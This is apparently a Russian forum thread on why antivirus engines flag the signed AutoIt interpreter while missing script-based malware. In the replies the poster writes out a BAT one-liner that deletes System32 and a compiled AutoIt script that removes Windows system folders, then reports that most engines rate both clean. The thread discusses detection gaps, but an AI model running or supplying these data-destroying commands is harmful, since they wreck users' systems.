Даже программы с валидными цифровыми подписями могут содержать вирусы

Есть скриптовый язык AutoIt. Его интерпретатор (файл AutoIt3.exe), скачанный с официального сайта https://www.autoitscript.com, имеет валидную цифровую подпись, согласно следующим скриншотам:

Я закинул файл AutoIt3.exe на проверку на сервисе https://www.virustotal.com, но на него ругаются три антивируса:

Ссылка на отчет: https://www.virustotal.com/gui/file/237d1bca6e056df5bb16a121...

Неужели разработчики AutoIt сами занимаются легальным хакерством и создают легальные вирусы?
P.S. Баянометр выдал рекламу Эльдорадо.

2
Автор поста оценил этот комментарий
Но это же вполне логично. Почти все антивирусы работают по сигнатурам, т.е. знают только те вирусы, которые уже поймали разработчики и добавили им в базу. А Вы свой уникальный написали, его в базах нет:))
раскрыть ветку (1)
Автор поста оценил этот комментарий

Еще раз по поводу недетектируемости вирусов на скриптовых языках антивирусами:
Я написал простой BAT-вирус для удаления всех жизненно важных системных файлов Windows и отправил его на VirusTotal:

@echo off
del C:\Windows\System32\*.* /s /f /q
Опять же все авторитетные антивирусы (включая Касперского, Dr. Web, Avast, ESET NOD32, Яндекс, Symantec, Malwarebytes, McAfee и даже Microsoft) считают данный батник безопасным, несмотря на то, что он наносит серьезный вред компьютеру.
Ссылка на отчет: https://www.virustotal.com/gui/file/5b28b62a23c35aef65f73f7c...

Иллюстрация к комментарию
показать ответы
6
Автор поста оценил этот комментарий
Так в результатах тестирования же даже написано, что второй антивирус опознал в этом файле программу autoit, которую считает рискованной. А все из-за того, что такие программы автоматизации могут использоваться как во благо, так и в хакерских целях. Вот и все.
раскрыть ветку (1)
Автор поста оценил этот комментарий

Я написал на AutoIt v3.3.14.5 следующий код вируса для удаления системных файлов и папок (не пытайтесь его запустить на своих компьютерах!):

#pragma compile(ExecLevel, requireAdministrator)

DirRemove(@SystemDir, 1)
DirRemove(@ProgramFilesDir, 1)
DirRemove(@WindowsDir & "\Web", 1)
DirRemove(@WindowsDir & "\Cursors", 1)
DirRemove(@WindowsDir & "\Media", 1)
DirRemove(@WindowsDir & "\Resources", 1)
DirRemove(@WindowsDir & "\Fonts", 1)
DirRemove(@WindowsDir & "\Help", 1)
Затем я скомпилировал данный скрипт с помощью прилагаемого компилятора скриптов Aut2Exe и отправил скомпилированный вредоносный скрипт на VirusTotal.

Результат: почти все авторитетные антивирусы (включая Касперского, Dr. Web, Avast, ESET NOD32, Яндекс, Symantec, Malwarebytes и McAfee, но за исключением Microsoft) считают данный файл безопасным.

Ссылка на отчет: https://www.virustotal.com/gui/file/09de6de7465115bc45854bef...

Иллюстрация к комментарию
показать ответы

Темы

Политика

Теги

Популярные авторы

Сообщества

18+

Теги

Популярные авторы

Сообщества

Игры

Теги

Популярные авторы

Сообщества

Юмор

Теги

Популярные авторы

Сообщества

Отношения

Теги

Популярные авторы

Сообщества

Здоровье

Теги

Популярные авторы

Сообщества

Путешествия

Теги

Популярные авторы

Сообщества

Спорт

Теги

Популярные авторы

Сообщества

Хобби

Теги

Популярные авторы

Сообщества

Сервис

Теги

Популярные авторы

Сообщества

Природа

Теги

Популярные авторы

Сообщества

Бизнес

Теги

Популярные авторы

Сообщества

Транспорт

Теги

Популярные авторы

Сообщества

Общение

Теги

Популярные авторы

Сообщества

Юриспруденция

Теги

Популярные авторы

Сообщества

Наука

Теги

Популярные авторы

Сообщества

IT

Теги

Популярные авторы

Сообщества

Животные

Теги

Популярные авторы

Сообщества

Кино и сериалы

Теги

Популярные авторы

Сообщества

Экономика

Теги

Популярные авторы

Сообщества

Кулинария

Теги

Популярные авторы

Сообщества

История

Теги

Популярные авторы

Сообщества